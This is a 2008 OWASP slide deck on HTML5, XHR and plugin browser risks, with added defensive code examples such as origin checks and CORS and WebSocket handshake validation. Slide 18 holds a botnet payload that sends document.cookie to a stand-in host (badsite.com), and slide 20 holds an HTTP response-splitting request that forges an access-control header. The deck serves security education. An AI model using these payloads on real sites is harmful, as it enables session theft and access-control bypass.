Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Slide 1: OWASP – Browser Security
Copyright © The OWASP Foundation. Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation, http://www.owasp.org
Roberto Suggi Liverani, Security Consultant, Security-Assessment.com
3 September 2008

Slide 2: Who am I?
- Roberto Suggi Liverani
- Security Consultant, CISSP - Security-Assessment.com
- 4+ years in information security, focusing on web application and network security
- OWASP New Zealand founder/leader

Slide 3: Agenda
- Introduction
- A look to the present
- The potential risks
- Some challenges
  - HTML 5.0
  - WebApps (XHR)
  - Browser Plugins
- OWASP approach to the problem
  - OWASP Intrinsic Group

Slide 4: Introduction
- Present: web security focus is mainly on web apps rather than browsers
- But: browser bugs affect many more users than web application bugs

Slide 5: Introduction
- Browser statistics from w3schools.com
- JavaScript statistics

Slide 6: Introduction
- The risks are not just in the numbers…
- Do you remember the “On the job browser exploitation” talk by Mark Piper?
- Technologies evolve:
  - HTML5
  - XHR
  - Browser plugins
- Current browser security progress is mainly focused on:
  - Reflected XSS filtering and CSRF protection
  - Phishing web site detection

Slide 7: Next Challenges
- HTML5 (W3C working draft)
- New features with a security impact:
  - Origin policy
  - Browsing contexts and navigation
  - Custom protocol and content handlers
  - Structured client-side storage
  - Offline web applications
  - Cross-document messaging
  - Server-sent events
  - Web sockets

Slide 8: HTML5
- Relaxing the origin policy:
  - Window object origin-policy exceptions:
    - Location object
    - postMessage()
    - frames attribute
    - XXX4 method
Diagram: x.hello.com and y.hello.com both set document.domain = hello.com; an XSS injection in one subdomain gives communication between the two subdomains.

Slide 9: HTML5
- Browsing contexts and navigation
  - Opener browsing context: 1.COM
  - Auxiliary browsing context: 3.COM
  - Nested browsing context: 2.COM
Diagram: 1.COM (vulnerable) is the opener; 3.COM is a malicious third party. (a) Injection in 1.COM of document.open pointing to 3.COM; (b) iframe injection with src=2.COM; result: cross context scripting between 2.COM and 3.COM.

Slide 10: HTML5
- Custom protocol and content handlers
  - registerProtocolHandler() – ftp:, fax:, foo:
  - registerContentHandler() – MIME type, e.g. text/foo
Diagram: A.COM runs navigator.registerContentHandler('text/foo', 'foo?url=%s', 'foo'); when the user downloads Test.foo served as text/foo from B.COM, the browser redirects to http://a.com/foo?url=b.com/test.foo.

Slide 11: HTML5
- Hijacking content or protocol handlers
  - navigator.registerProtocolHandler('HTTPS', 'foo?url=%s', 'foo')
- Register spamming
  - A site tries to register multiple protocol/content handlers
  - Multiple sites try registering video/mpeg content
- Leaking intranet URLs
  - User registers a certain content handler (text/foo)
  - User clicks http://192.168.0.32/hello.foo
  - User is redirected to an external site which handles text/foo
- Leaking HTTPS
  - User is redirected to a site with an HTTPS URL
  - Credentials leak in the GET request

Slide 12: HTML5
- Structured client storage
  - sessionStorage (adds data to the session for all pages under the same domain)
  - localStorage (adds complex data to the client’s cache)
  - Methods: getItem(), setItem()
  - Only protection: origin policy
  - SQL, yes SQL!!! – to store more structured data
    - Methods: openDatabase(), executeSql()
    - Objects: SQLResultSet, SQLResultSetRowList, SQLError
  - More to come on “browser SQL injection”…

Slide 13: HTML5
- Client storage attack example (A. Trivero)
- Browser SQL injection example (A. Trivero)
- Cross-directory attack
  - XSS in www.geocities.com/user1 can read/write data from/to www.geocities.com/user2
- User tracking: UI put in client storage in multiple sites (marketing, botnet, etc.)
- Cookie resurrection

Slide 14: HTML5
- Offline web applications
  - Extensive Application Cache API
  - http://a.com/manifest
  - HTTP response with the text/cache-manifest MIME type for the manifest
  - The manifest specifies how specific site content should be cached = application cache policy
  - New items can be added to specific cached content with the add() method
  - Different versions of cached content for the same site
  - Application cache status can be queried: Uncached, Idle, Checking, Download, Updateready

Slide 15: HTML5
- Application cache poisoning
  - A.COM’s manifest allows caching of a vulnerable HTML page containing DOM XSS
  - The DOM XSS manipulates data when the page is viewed in offline mode
- Attacking the offline browser
  - Offline application cache content with stored XSS that sets navigator.onLine = true

Slide 16: HTML5
- Cross-document messaging
  - “While this (origin policy) is an important security feature, it prevents pages from different domains from communicating even when those pages are not hostile” – 7.4 W3C HTML5 current draft
  - postMessage(message, messagePort, targetOrigin)

Receiving page (accepts messages from http://a.com):

    window.addEventListener('message', receiver, false);
    function receiver(e) {
      if (e.origin == 'http://a.com') {   // NOTE: this condition can be omitted or set to '*'
        if (e.data == 'Hello world') {
          e.source.postMessage('Hello', e.origin);
        } else {
          alert(e.data);
        }
      }
    }

Sending page (posts into an iframe, with target origin http://b.com/):

    var o = document.getElementsByTagName('iframe')[0];
    o.contentWindow.postMessage('Hello world', 'http://b.com/');
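The receiver from the slide with and without its origin check, as an added example that is not part of the original presentation; it runs in Node against a constructed stand-in for MessageEvent, and the names makeReceiver, fakeEvent, run and ALLOWED_ORIGIN are assumptions.

```javascript
// Added example (not from the slides): the slide's receiver, with the
// origin condition either enforced or omitted as the slide's NOTE allows.
// Assumed names: ALLOWED_ORIGIN, makeReceiver, fakeEvent, run.
const ALLOWED_ORIGIN = 'http://a.com';

// Build a 'message' handler. With checkOrigin=false any frame on any
// origin can drive it, which is exactly what the omitted condition means.
function makeReceiver(checkOrigin, log) {
  return function receiver(e) {
    if (checkOrigin && e.origin !== ALLOWED_ORIGIN) {
      log.push('dropped from ' + e.origin);       // unknown sender: ignore
      return;
    }
    if (e.data === 'Hello world') {
      // Reply to the origin just verified, never to '*'
      e.source.postMessage('Hello', e.origin);
    } else {
      log.push('handled: ' + String(e.data));     // stand-in for alert(e.data)
    }
  };
}

// Constructed stand-in for a MessageEvent; replies are recorded instead
// of crossing a real window boundary, so the block runs outside a browser.
function fakeEvent(origin, data) {
  const replies = [];
  return {
    origin,
    data,
    source: { postMessage: (msg, target) => replies.push(target + ':' + msg) },
    replies,
  };
}

// Deliver one message and report what the receiver did with it.
function run(checkOrigin, origin, data) {
  const log = [];
  const ev = fakeEvent(origin, data);
  makeReceiver(checkOrigin, log)(ev);
  return { log, replies: ev.replies };
}
```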

Slide 17: HTML5
- Server-sent events
  - Dispatching DOM events into a document that expects them
  - RemoteEventTarget is used to fetch data sent as an EventStream (text/event-stream) from:
    - Same site
    - Allowed sites (XHR access control)

Example EventStream, pulled by the client:

    data: http://www.google.com/news/1\n
    data: http://www.yahoo/com/news/3\n
    data: http://bbc.co.uk/news/2\n

Slide 18: HTML5
- Next generation web botnet – C&M interface
Diagram: the botnet pulls a data stream (MIME type text/event-stream) from badsite.com/evil.php via stored XSS in the botnet websites:

    Data: wait();\n
    Data: document.write(<img src='http://badsite.com/'+document.cookie);\n

The botnet operates within XHR access control for data exchange.

Slide 19: HTML5
- Web sockets – websocket(url);
- The botnet scenario applies as well

Handshake between the client at 123.com and the server at aa.com:

    GET ws://aa.com/ HTTP/1.1
    Upgrade: WebSocket
    Connection: Upgrade
    Host: 123.com
    Origin: http://123.com
    Authorization: Basic d2FsbGU6ZXZl

    HTTP/1.1 101 Web Socket Protocol Handshake
    Upgrade: WebSocket
    Connection: Upgrade
    WebSocket-Origin: http://aa.com
    WebSocket-Location: ws://aa.com:80/

Data framing: the client reads/sends data byte per byte; the server sends/reads raw UTF-8 data byte per byte. Close: the TCP/IP connection is closed with no handshake.
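A server-side check on the opening handshake shown above, as an added example that is not from the presentation: it parses the draft-style request and only completes the upgrade for an allowlisted Origin, since any page the browser visits can open a socket to the server. The sample request is constructed, and parseHandshake, handshakeResponse, ALLOWED_WS_ORIGINS and SAMPLE_HANDSHAKE are assumed names.

```javascript
// Added example (not from the slides): validate the draft WebSocket
// handshake on slide 19 before answering 101. Assumed names:
// ALLOWED_WS_ORIGINS, parseHandshake, handshakeResponse, SAMPLE_HANDSHAKE.
const ALLOWED_WS_ORIGINS = new Set(['http://123.com']);   // constructed policy

// Split a raw request into request line + lower-cased header map.
function parseHandshake(raw) {
  const lines = raw.split('\r\n');
  const [method, target, version] = lines[0].split(' ');
  const headers = {};
  for (const line of lines.slice(1)) {
    if (line === '') break;                          // end of header block
    const i = line.indexOf(':');
    if (i < 0) throw new Error('malformed header line: ' + line);
    headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { method, target, version, headers };
}

// Return the 101 response text, or null when the upgrade must be refused.
function handshakeResponse(raw, location) {
  const req = parseHandshake(raw);
  const h = req.headers;
  const isUpgrade = (h['upgrade'] || '').toLowerCase() === 'websocket' &&
                    /\bupgrade\b/i.test(h['connection'] || '');
  if (req.method !== 'GET' || !isUpgrade) return null;
  // The Origin header is the only signal of which page opened the socket;
  // a page on an unknown origin gets no socket, so it cannot pull commands.
  if (!ALLOWED_WS_ORIGINS.has(h['origin'])) return null;
  return [
    'HTTP/1.1 101 Web Socket Protocol Handshake',
    'Upgrade: WebSocket',
    'Connection: Upgrade',
    'WebSocket-Origin: ' + h['origin'],              // echo the verified origin
    'WebSocket-Location: ' + location,
    '', ''].join('\r\n');
}

// Constructed sample modelled on the slide's client request.
const SAMPLE_HANDSHAKE = [
  'GET / HTTP/1.1',
  'Upgrade: WebSocket',
  'Connection: Upgrade',
  'Host: aa.com',
  'Origin: http://123.com',
  '', ''].join('\r\n');
```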

Slide 20: WebApps (XHR)
- XHR access control (GET and POST)
Resource: aaa.com/test.txt; client: bbb.com

JavaScript + XHR on bbb.com:

    var client = new XMLHttpRequest();
    client.open("GET", "http://aaa.com/test.txt");   // or "POST"
    client.onreadystatechange = function() { /* do something */ };
    client.send();

HTTP response from aaa.com:

    Access-Control-Allow-Origin: http://bbb.com

    Hello World!

NOTE: the entire access control system relies on HTTP headers. So what happens with an HTTP splitting attack?

    var client = new XMLHttpRequest();
    client.open("GET", "http://aaa.com/test.txt%0A%0DAccess-Control-Allow-Origin: http://bbb.com%0a%0d%0a%0d");
    client.onreadystatechange = function() { /* do something */ };
    client.send();

Slide 21: WebApps (XHR)
- XHR access control (other HTTP methods)
Resource: aaa.com/test.txt; client: bbb.com

Preflight request (OPTIONS):

    var client = new XMLHttpRequest();
    client.open("OPTIONS", "http://aaa.com/test.txt");
    client.onreadystatechange = function() { /* do something */ };
    client.send();

HTTP response:

    Access-Control-Allow-Origin: http://bbb.com
    Access-Control-Max-Age: 3628800

Actual request (DELETE):

    var client = new XMLHttpRequest();
    client.open("DELETE", "http://aaa.com/test.txt");
    client.onreadystatechange = function() { /* do something */ };
    client.send();

NOTE: the entire access control system relies on HTTP headers.
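The server side of the access-control exchange on slides 20 and 21, as an added example that is not from the presentation: an origin allowlist, the OPTIONS preflight answered with the Max-Age shown on the slide, and a single header-writing choke point that refuses CR/LF, which is what the splitting payload on slide 20 depends on. Names ALLOWED_ORIGINS, safeHeader, accessControlFor and locationFor are assumptions; the Access-Control-Request-Method header is the standard CORS preflight header, not one shown on the slides.

```javascript
// Added example (not from the slides): minimal server policy for the
// XHR access-control flow. Assumed names: ALLOWED_ORIGINS, safeHeader,
// accessControlFor, locationFor.
const ALLOWED_ORIGINS = new Set(['http://bbb.com']);    // constructed policy
const SIMPLE_METHODS = new Set(['GET', 'POST', 'HEAD']);
const PREFLIGHT_METHODS = new Set(['DELETE', 'PUT']);

// Every header goes through here: a CR/LF inside a value would end the
// header line and let the rest be parsed as further headers or body.
function safeHeader(headers, name, value) {
  if (/[\r\n]/.test(name) || /[\r\n]/.test(String(value))) {
    throw new Error('refusing header containing CR/LF: ' + name);
  }
  headers[name] = String(value);
  return headers;
}

// Decide the status and Access-Control-* headers for one request.
// req = { method, url, headers } with lower-cased header names.
function accessControlFor(req) {
  const headers = {};
  const origin = req.headers['origin'];
  if (!origin || !ALLOWED_ORIGINS.has(origin)) {
    return { status: 403, headers };          // unknown origin: no ACAO at all
  }
  safeHeader(headers, 'Access-Control-Allow-Origin', origin);
  if (req.method === 'OPTIONS') {
    // Preflight (slide 21): confirm the non-simple method and let the
    // browser cache the decision for Access-Control-Max-Age seconds.
    const wanted = req.headers['access-control-request-method'] || '';
    if (!PREFLIGHT_METHODS.has(wanted)) return { status: 403, headers: {} };
    safeHeader(headers, 'Access-Control-Allow-Methods', wanted);
    safeHeader(headers, 'Access-Control-Max-Age', 3628800);
    return { status: 204, headers };
  }
  if (!SIMPLE_METHODS.has(req.method) && !PREFLIGHT_METHODS.has(req.method)) {
    return { status: 405, headers: {} };
  }
  return { status: 200, headers, body: 'Hello World!' };
}

// Where the slide's %0A%0D payload would bite: a header built from the
// decoded request path. safeHeader throws instead of emitting it.
function locationFor(req) {
  return safeHeader({}, 'Location', decodeURIComponent(req.url))['Location'];
}
```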

Slide 22: XHR Alternative – XDR (XDomainRequest)
- Cross-domain request developed by Microsoft
Resource: aaa.com/xdr.txt; client: bbb.com

JavaScript + XDR on bbb.com:

    var xdr = new XDomainRequest();
    xdr.open("GET", "http://www.aaa.com/xdr.txt");
    xdr.send();

HTTP request:

    GET /xdr.txt
    XDomainRequest: 1
    Host: bbb.com

HTTP response:

    XDomainRequestAllowed=1

    Hello!

NOTE: the entire XDR relies on HTTP headers.

Slide 23: Browser Plugins
- Adobe Flash
  - LSO (Local Shared Objects)
    - Cookie system completely managed by Adobe
    - 100KB of cache data allowed by default
    - Third-party LSOs are allowed by default (100KB cache)
    - LSO data is stored and accessed “stealthily”
    - Typically stored in: C:\Documents and Settings\[username]\Application Data\Macromedia\Flash Player
    - Files are in the .sol format
  - This “feature” has already been exploited:
    - United Virtualities -> PIE (Persistent Identification Element)
    - Creates a unique ID for each browser and then stores it in an LSO

Slide 24: Browser Plugins
- ActionScript FileReference.download bypasses browser security settings
- IKAT’s Paul Craig 0day technique to bypass kiosk software protection (IE’s security model)
- Something like:

    import flash.events.MouseEvent;
    import flash.net.FileReference;
    import flash.net.URLRequest;

    // "test" is the clickable display object on the stage
    test.addEventListener(MouseEvent.CLICK, downloadFile);
    var fileRef:FileReference = new FileReference();
    function downloadFile(event:MouseEvent):void {
      fileRef.download(new URLRequest("http://www.aaa.com/file.html"), "file.html");
    }

Slide 25: OWASP Intrinsic Group
- Aid browser vendors and framework vendors in addressing current security issues
- Focus on:
  - HTML5 Working Group
  - XMLHttpRequest
  - WebApp Working Group
  - Mozilla Firefox
  - Adobe (AIR/Flash)
  - Microsoft IE7
  - Microsoft .NET
  - Struts
  - Spring
  - Apache Commons
- Soon: OWASP Top Ten Browser Security

Slide 26: Questions?
- robertosl@owasp.org
- http://malerisch.net
- http://www.owasp.org/index.php/New_Zealand

Slide 27: References
- HTML5
  - http://www.whatwg.org/specs/web-apps/current-work
- XHR and XHR Level 2
  - https://wiki.mozilla.org/Cross_Site_XMLHttpRequest
  - http://dev.w3.org/2006/webapi/XMLHttpRequest-2
- Access Control for XHR
  - http://www.w3.org/TR/access-control/
- XDR
  - http://msdn.microsoft.com/en-us/library/cc288108(VS.85).aspx
  - http://lists.w3.org/Archives/Public/public-appformats/2008Mar/0017.html
- LSO
  - http://epic.org/privacy/cookies/flash.html
  - https://www.flashsec.org/wiki/Shared_Objects#Storage_location
  - http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager07.html
  - http://www.adobe.com/products/flashplayer/articles/lso/
  - http://en.wikipedia.org/wiki/Local_Shared_Object

Slide 28: References
- HTML5 presentation
  - http://www.owasp.org/index.php/AppSecEU08_HTML5
- Abusing HTML 5 Structured Client-side Storage
  - http://trivero.secdiscover.com/html5whitepaper.pdf
- Web stats
  - http://www.internetworldstats.com/stats.htm
- Browser stats
  - http://www.w3schools.com/browsers/browsers_stats.asp

